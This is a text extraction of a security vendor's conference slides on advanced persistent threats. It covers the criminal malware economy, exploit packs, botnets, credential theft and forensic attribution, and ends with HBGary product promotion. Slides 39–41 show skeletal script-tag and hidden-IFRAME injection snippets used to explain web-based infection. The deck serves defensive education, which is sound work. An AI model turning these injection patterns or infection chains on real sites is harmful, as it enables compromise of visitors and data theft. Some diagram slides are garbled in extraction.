Advanced Persistent Threat Observations Techniques and Countermeasures Outline
Advanced Persistent Threat Observations, Techniques and Countermeasures
Outline of Talk n APT – What is it? What it isn’t… n High Level Observations – 4 facts (I believe) n You’re Already P 0 wn 3 d! How APT Succeeds n The Problems/Gaps in Current Enterprise Security n How to Prepare Your Organization for Detecting and Responding to APT? P A G E 1
Wake Up Call Google cyber attacks a 'wake-up' call -Director of National Intelligence Dennis Blair My mom now knows what I do for a living…. “yes mom I worked on some of that stuff”… “wow she said”. http: //www. csmonitor. com/USA/2010/0204/Google-cyber-attacks-a-wake-up-call-for-US-intel-chief-says P A G E 2
APT – What is it? It isn't malware! n A human being or organization, who operates a campaign of intellectual property theft using cyber-methods l Malware, malware l People Processes Technology – n Basically, the same old problem, but it’s getting far worse and far more important than ever before l Old school – kids & hackerz – reputation l Now – adults and kids with – cyber warfare & espionage P A G E 3
MI 5 says the Chinese government “represents one of the most significant espionage threats” http: //www. timesonline. co. uk/tol/news/uk/crime/article 7009749. ece P A G E 4
Espionage P A G E 5
APT – Think Military Operations stuff n Military Doctrine Approach – l ISR (intelligence, surveillance, and reconnaissance) l Mission Planning — What is our goal? “steal the source code for the new xyz search engine and cloud computing software platform” — How do we achieve the goal with least risk? Have Really Good Intelligence – Get some spies on the inside to help gather information from a “trusted insider” perspective – Perhaps they will have access through their job so there is no need to steal! – If that doesn’t work P A G E 6
High Level Observations n Fact 1: Sophisticated criminal attacks and what appear to be state sponsored attacks are increasingly becoming the focus of IT security operations and efforts in many vertical markets today – Govt, Energy, Finance, Technology, Critical Infrastructure. n Fact 2: Existing IT security investments required but ineffective to detect and block the modern attacks and protect enterprise data E Crimes & Advanced Persistent Threats Report – 451 Group – March 2010 P A G E 7
High Level Observations n Fact 3: APT malware we are seeing/hearing about is driving demand for new IT Security Solutions – more visibility – scalability – threat correlation & forensics n Fact 4: The ability to detect and react to new threats and attacks is hampered by a lack of reliable, impartial data, and regulatory compliance – which has unfortunately has supplanted security as a main driver of IT security investment E Crimes & Advanced Persistent Threats Report – 451 Group – March 2010 P A G E 8
Anatomy of APT Malware Survive Reboot C&C Protocol File Search Process Injection Update Keylogger Pass the Hash USB Stick Command and Control Server and 1 Command Control Server 1 - n P A G E 9
IP is Leaving The Network Right Now n Everybody in this room who manages an Enterprise with more than 10, 000 nodes YOU ARE ALREADY OWNED They are STEALING right now, as you sit in that chair. P A G E 10
The Coming Age of Cyber n Advanced nations are under constant cyber attack. This is not a future threat, this is now. This has been going on for YEARS n Cyber Cartels are rapidly going to surpass Drug Cartels in their impact on Global Security l The scope of finance will surpass drug cartels l The extent of the operation internationally P A G E 11
Big Brother Opennet. net P A G E 12
Cash is not the only motive n State sponsored (economic power) n Stealing of state secrets (intelligence & advantage) n Stealing of IP (competitive / strategic advantage – longer term) l Think Aurora - n Infrastructure & SCADA (wartime strike capable) n Info on people (not economic) l i. e. , Chinese dissidents – P A G E 13
Why Enterprise Security Products DON’T WORK P A G E 14
The True Threat n Malware is a human issue l Bad guys are targeting your digital information, intellectual property, and personal identity n Malware is only a vehicle for intent l Theft of Intellectual Property l Business Intelligence for Competitive Advantage l Identity Theft for Online Fraud P A G E 15
The Scale Over 100, 000 malware automatically generated and released daily. Signature based solutions are tightly coupled to individual malware samples, thus cannot scale. http: //www. avertlabs. com/research/blog/index. php/2009/03/10/avert-passes-milestone-20 -millionmalware-samples/ P A G E 16
Surfaces n The attacks today are just as effective as they were in 1999 The bad guys STILL HAVE their zero day, STILL HAVE their vectors, and STILL HAVE their malware P A G E 17
Not an antivirus problem n Malware isn’t released until it bypasses all the AV products l Testing against AV is part of the QA process n AV doesn’t address the actual threat – the human who is targeting you n AV has been shown as nearly useless in stopping the threat l AV has been diminished to a regulatory checkbox – it’s not even managed by the security organization, it’s an IT problem P A G E 18
Annealing C Value Horizon o m s re P R e t w o d in ss e n d e Us s ve o C P r Ha w rflo of W R ote m re s dow in W of P A G E 19
Continuum Value Horizon Continuous area of attack C P R te mo nd Wi re s w o II er S S ver ws o l f r ove gs s u e. B I GD g Ima w rflo e v h. O s Fla P A G E 20
Technology Lifecycle Value Horizon Area of attack P A G E 21
Continuous Area of Attack By the time all the surfaces in a given technology are hardened, the technology is obsolete Value Horizon Continuous area of attack Technology Lifecycle P A G E 22
The Global Malware Economy P A G E 23
A Global Theatre n There are thousands of actors involved in theft of information, from technology developers to money launderers n Over the last decade, an underground economy has grown to support espionage and fraud n This “malware ecosystem” supports both Crimeware and e. Espionage P A G E 24
$1, 000 + $500+ $10, 000+ for 0 -day Implant Vendor $10, 000+ for 0 -day Rootkit Developer $1000+ Rogueware Developer e. Gold Wizard Country that doesn’t co-op w/ LE Keep 10% Small Transfers Secondary A single operator here may recruit 100’s of mules per week Forger $50 Exploit Developer Exploit Pack Vendor Bot Vendor Payment system developer atm ~4% of bank customers Victims $5, 000 incrm. Keep 50% Drop Man Cashier / Mule Bank Broker Keep 10% Back Office Developer Account Buyer Country where account is physically located $100. 00 per 1000 infections Affiliate Botmaster ID Thief PPI Endpoint Exploiters Sells accounts in bulk $5. 00 per P A G E 25
Crimeware and the State n Using Crimeware collected from the underground makes it harder to attribute the attack, since it looks like every other criminal attack l There is no custom code that can be fingerprinted – sort of… P A G E 26
China “there are the intelligence-oriented hackers inside the People's Liberation Army” “There are hacker conferences, hacker training academies and magazines” “loosely defined community of computer devotees working independently, but also selling services to corporations and even the military” When asked whether hackers work for the government, or the military, [he] says "yes. " http: //news. cnet. com/Hacking-for-fun-and-profit-in-Chinas-underworld/2100 -1029_3 -6250439. html P A G E 27
P A G E 28
Crimeware Networks Go Legit n Grown out of older adware business models n Think - Fake Antivirus n There is a fine line between adware and malware P A G E 29
Pay-per-install. org P A G E 30
Earning 4 u Pays per 1, 000 infections P A G E 31 * http: //www. secureworks. com/research/threats/ppi/
PPI Programs P A G E 32 * http: //www. secureworks. com/research/threats/ppi/
Custom Crimeware Programming Houses P A G E 33
Anatomy of an APT Operation P A G E 34
Anatomy of an APT Operation n You must understand that ongoing operations are underway – this involves one or more primary actors, and potentially many secondary actors P A G E 35
Malware Distribution Systems n Human Factor – Don’t rule out – harder to catch l Think Insiders being paid by your adversaries… maybe they are aware of the operation and maybe they are not… n Many, Attack Vectors l Targeted Browser attacks l Spear & Whale Phishing l Zero Day or well known exploits l Slow and Low & Loud and Proud – they do it all l Re-Direction – I expect you to find my first 2 malware infections n Precise whale-phishing or spear-phishing attacks l Contain booby trapped documents n Backdoored physical media l USB, Camera, CD’s left in parking lot, ‘gifts’ P A G E 36
Booby Trapped Documents • Single most effective focused attack today • Human crafts text to look legitimate P A G E 37
Web Based Attack Social Networking Space Injected Javascript • Used heavily for large scale infections • & Targeted Operations for specific groups of people…. P A G E 38
Trap Postings I www. somesite. com/somepage. php Some text to be posted <script> to… </script the site > …. P A G E 39
Trap Postings II www. somesite. com/somepage. php Some text to be posted to… <IFRAME src= style=“display: none”> </IFRAME> the site …. P A G E 40
SQL Injection www. somesite. com/somepage. php SQL attack, inserts IFRAME or script tags P A G E 41
‘Reflected’ injection Link contains a URL variable w/ embedded script or IFRAME * User clicks link, thus submitting the variable too Trusted site, like. com, . gov, . edu *For an archive of examples, see xssed. com The site prints the contents of the variable back as regular HTML P A G E 42
A three step infection Injected Java-script Redirect Exploit Server 101010 Browser Exploit Payload Server Dropper P A G E 43
Eleonore (exploit pack) P A G E 44
Tornado (exploit pack) P A G E 45
Napoleon / Siberia (exploit pack) P A G E 46
Rogueware n 35 million computers infected every month with rogueware* n Many victims pay for these programs, $50 -$70, and stats show bad guys are making upwards of $34 million dollars a month with this scam* n One of our Sales Guy’s bought into this – bought fake AV! n Fake Antivirus is now 10% off all search results l Google search “antivirus” P A G E 47 *http: //www. pandasecurity. com/img/enc/The%20 Business%20 of%20 Rogueware. pdf
Rogueware P A G E 48
Payload Server n A machine that has the actual malware dropper ready for download. n The exploit server will redirect the victim to download a binary from this location P A G E 49
Command Control Once installed, the malware phones home… TIMESTAMP SOURCE COMPUTER USERNAME VICTIM IP ADMIN? OS VERSION HD SERIAL NUMBER SAM FILE SECURITY SOFTWARE USER NAMES & PASSWORDS P A G E 50
Command Control Server n The C&C system may vary l Custom protocol (Aurora-like) l Plain Old Url’s – Very Hard to Identify l IRC (not so common anymore) l Stealth / embedded in legitimate traffic l Automation l Dyn. DNS n Machine identification l Stored infections in a back end SQL database P A G E 51
Command Control These commands map to a foreign language keyboard. P A G E 52
IRC C&C IRC control channel for a DDOS botnet Most of the C&C has moved to the web. P A G E 53
Triad (botnet) P A G E 54
Zeu. S (botnet) P A G E 55
P A G E 56
Fragus (botnet) P A G E 57
Implants & Persistence n The ‘persistent’ backdoor program n Hide in plain sight strategy l Some DLL that to the trained eye looks normal n General purpose hacking tool n Stealth capabilities n In-field update capabilities P A G E 58
Poison Ivy (implant) P A G E 59
CRUM (protector) P A G E 60
Steal Credentials Outlook Email Password Generic stored passwords P A G E 61
Steal Files All the file types that are exfiltrated P A G E 62
Staging Server n A place to store all the stolen goods before it gets ‘exfiltrated’ l Data is moved off the network in a variety of ways – ‘Hacking Exposed’ level behavior P A G E 63
Drop Site n Sometimes the stolen data is moved to a tertiary system, not the same as the C&C P A G E 64
Drop-point is in Reston, VA in the AOL netblock P A G E 65
Preparing to Detect and Respond to APT P A G E 66
Preparing to Detect and Respond to APT n HOST/End Point Strategy: servers & workstations l Physical Memory Analysis Capabilities l Physical Disk Analysis Capabilities — Think Forensic Visibility “everywhere” — Multiple endpoints will be involved Need to view them ALL at the lowest levels possible – RAW disk & RAW Memory — Need to be able to search EVERYTHING for indicators of compromise (IOC) — l Endpoint, live-state forensics, ongoing monitoring n NETWORK – All Ingress & Egress Points l Collection, Archiving, Analysis, Alerting, Indexing, Correlation P A G E 67
After Detection & Remediation, Our Goals Are Attribution n Is Attribution Possible? l Sometimes yes, sometimes no. l Preparation is 90% - luck is a big part too… n The bad guy doesn’t change that much l Repeated use of the same exploit methods l Repeated use of same C&C system n His intention is singular l Identity theft, or IP-theft, you pick l If IP-theft, is it specific? Insight into why someone is after you — You know what to protect — P A G E 68
Threat Intelligence is Important to Manage the Risk and Apply Resources n Who is targeting you? n What are they after? n Have they succeeded? n How long have they been succeeding? n What have I lost so far? n What can I do to counter their methods? n Are there legal actions I can take? P A G E 69
Information Points Pulled from Malware Analysis n Drop site where IP is being dropped l IP Address, Server Version, Country of Origin n Command Control Server l Version of C&C, Fingerprint l Designed to survive takedowns l Hot staged failovers likely l Dynamic DNS – Must block or be aware of!! n Exploit Pack Server l Version of Exploit Pack, Fingerprint P A G E 70
Intel Feeds – Make use of these and others n malwaredomainlist. com n abuse. ch n spamcop. net n team-cymru. org n shadowserver. org P A G E 71
Forensic Marks left by Actors n Forensic marks occur at all points where software development occurs n They also occur in less obvious places l All points where binary is translated into new forms (parsed, packaged, etc) n These forensic marks may identify the original developer of the software n Obviously, only certain actors leave marks P A G E 72
Digital Fingerprints n Several actors in the underground economy will leave digital fingerprints n What is represented digitally l Distribution system l Exploitation capability l Command Control l Payload (what does it do once its in) P A G E 73
The developer != operator n The developer may not have any relation to those who operate the malware n The operation is what’s important n Ideally, we want to form a complete picture of the ‘operation’ – who is running the operation that targets you and what their intent is P A G E 74
DISK FILE IN MEMORY IMAGE OS Loader Same malware compiled in three different ways MD 5 Checksums all different Code idioms remains consistent P A G E 75
IN MEMORY IMAGE Packer #1 OS Loader Packer #2 Starting Malware Packed Malware Decrypted Original Unpacked portions remains consistent In-memory analysis tends to defeat packers P A G E 76
OS Loader IN MEMORY IMAGE Malware Tookit Toolkit Marks Detected Different Malware Authors Using Same Toolkits and developer signature s can be detected Packed P A G E 77
Country of Origin n Country of origin l Is the bot designed for use by certain nationality? n Geolocation of IP is NOT a strong indicator l However, there are notable examples l Is the IP in a network that is very unlikely to have a thirdparty proxy installed? — For example, it lies within a government installation C&C map from Shadowserver, C&C for 24 hour period P A G E 78
Language n Native language of the software, expected keyboard layout, etc – intended for use by a specific nationality l Be aware some technologies have multiple language support n Language codes in resources P A G E 79
Actor: Endpoint Exploiter – Follow the $$ n The exploiter of the end nodes, sets up the XSS or javascript injections to force redirects n Newcomers can learns various attack methods from their PPI affiliate site (mini-training) n These are generally recruited hackers from forums (social space) n The malware will have an affiliate ID l “somesite. com/something? aflid=23857 look for potential ID’s – this ID’s the individual endpoint exploiter Endpoint Exploiters $100. 00 per 1000 infections P A G E 80
URL artifact Codenamed C&C Botmaster Fingerprint Unique Affiliate ID’s Endpoints Link Analysis P A G E 81
Actor: Bot Master n Owns the box that accepts inbound infection requests, pays out by ID l Pays for numbers of collected credentials l Collect stolen identities and resell l Accounting system for all successful infections n Pay-per-infection business model l This implies a social space n Configuration settings on server will be reflected in client infections (additional resolution to differentiate multiple actors using the same bot technology) n Version of bot system offers more resolution, and potential indicator of when it was stood up n The Bot Master will have a preference for a particular bot control system – can be softlinked to this actor P A G E 82
Actor: Account Buyer n Buy stolen creds from the collectors n Use stolen credentials to move money out of victim bank accounts l These guys touch the victim accounts n Source IP of transaction, Use of TOR / Hack. TOR, Use of botnet to redirect, etc. l This part is audited in your network logs, so … l Multiple attacks by the same person are likely to be cross-referenced l Not a very strong fingerprint P A G E 83
Actor: Mules & Cashiers n Accept stolen money into accounts in the native country of the subverted bank and redirect that money back out into foreign accounts l These transactions must stay below trigger levels l $5, 000 or less n These actors do not leave forensic marks on the malware chain l Banking records only P A G E 84
Actor: Wizards n Move E-Gold into ATM accounts that can be withdrawn in the masters home country n Will take a percentage of the money for himself n This actor does not leave a forensic mark on the malware chain l Banking records typically don’t even work here, as the transaction has already been processed thru e-Gold P A G E 85
Actor: Developers n Sell bot systems for four figures l $4, 000 - $8, 000 with complete C&C and SQL backend n Sell advanced rootkits for low five figures l Possibly integrated into a bot system l Possibly used as a custom extension to a bot, integrated by a botmaster, $10, 000 or more easily for this n All of this development is strongly fingerprinted in the malware chain P A G E 86
We want to find a connection here C&C Fingerprint Botmaster URL artifact Affiliate ID Developer Protocol Fingerprint Endpoints Developer C&C products Link Analysis P A G E 87
Soft linking into the Social Space n Where is it sold, does that location have a social space? l If it has a social space, then this can be targeted l Forum, IRC, instant messaging n Using link-analysis, a softlink can be created between the developer of a malware product and anyone else in the social space l Slightly harder link if the two have communicated directly l If someone asks for tech support, indicates they have purchased l If someone queries price, etc, then possibly they have purchased P A G E 88
Software Author Social Space Link Analysis P A G E 89
Working back the timeline n Who sells it, when did that capability first emerge? l Requires ongoing monitoring of all open-source intelligence, presence within underground marketplaces l Requires budget for acquisition of emerging malware products P A G E 90
Software Author Social Space i. e. , Technical Support Query made AFTER version 1. 4 Release Use of timeline to differentiate links Link Analysis P A G E 91
Actor: Vuln Researchers n Paid well into the five figures for a good, reliable exploit l $20, 000 or more for a dependable IE exploit on latest version n Injection vector & activation point can be fingerprinted l Method for heap grooming, etc l Delivery vehicle P A G E 92
In Conclusion n To Prepare for APT l Must Develop Teams with expertise in ALL 4 Disciplines of Computer System Forensics – From WOMB TO TOMB. — Network Traffic Capture and Analysis at all Ingress & Egress Points — Host Disk Data — Host RAM Data — Malware Analysis & Reverse Engineering — People Process Technology n Go ‘beyond the checkbox’ l Invest in solutions to Mitigate Risk” or Limit Loss and Exposure to real threats n Funded adversaries with intent will never stop until they achieve their goals. . . l Cleaning up an infection doesn’t mean squat… How do you know if you got it all? P A G E 93
HBGary Thank You n www. hbgary. com n Cyber Security Solutions for the Enterprise l Active Defense with Digital DNA – Enterprise Malware Detection, Continuous Monitoring and Response System l Digital DNA™ - codified detection of zero day malware — Integrated into several Enterprise products, Mc. Afee e. PO, Guidance En. Case, more to be announced l Responder™ – malware analysis and physical memory forensics l Recon – Malware Sandbox – Kernel Tracing for Malware Forensics P A G E 94
- Slides: 95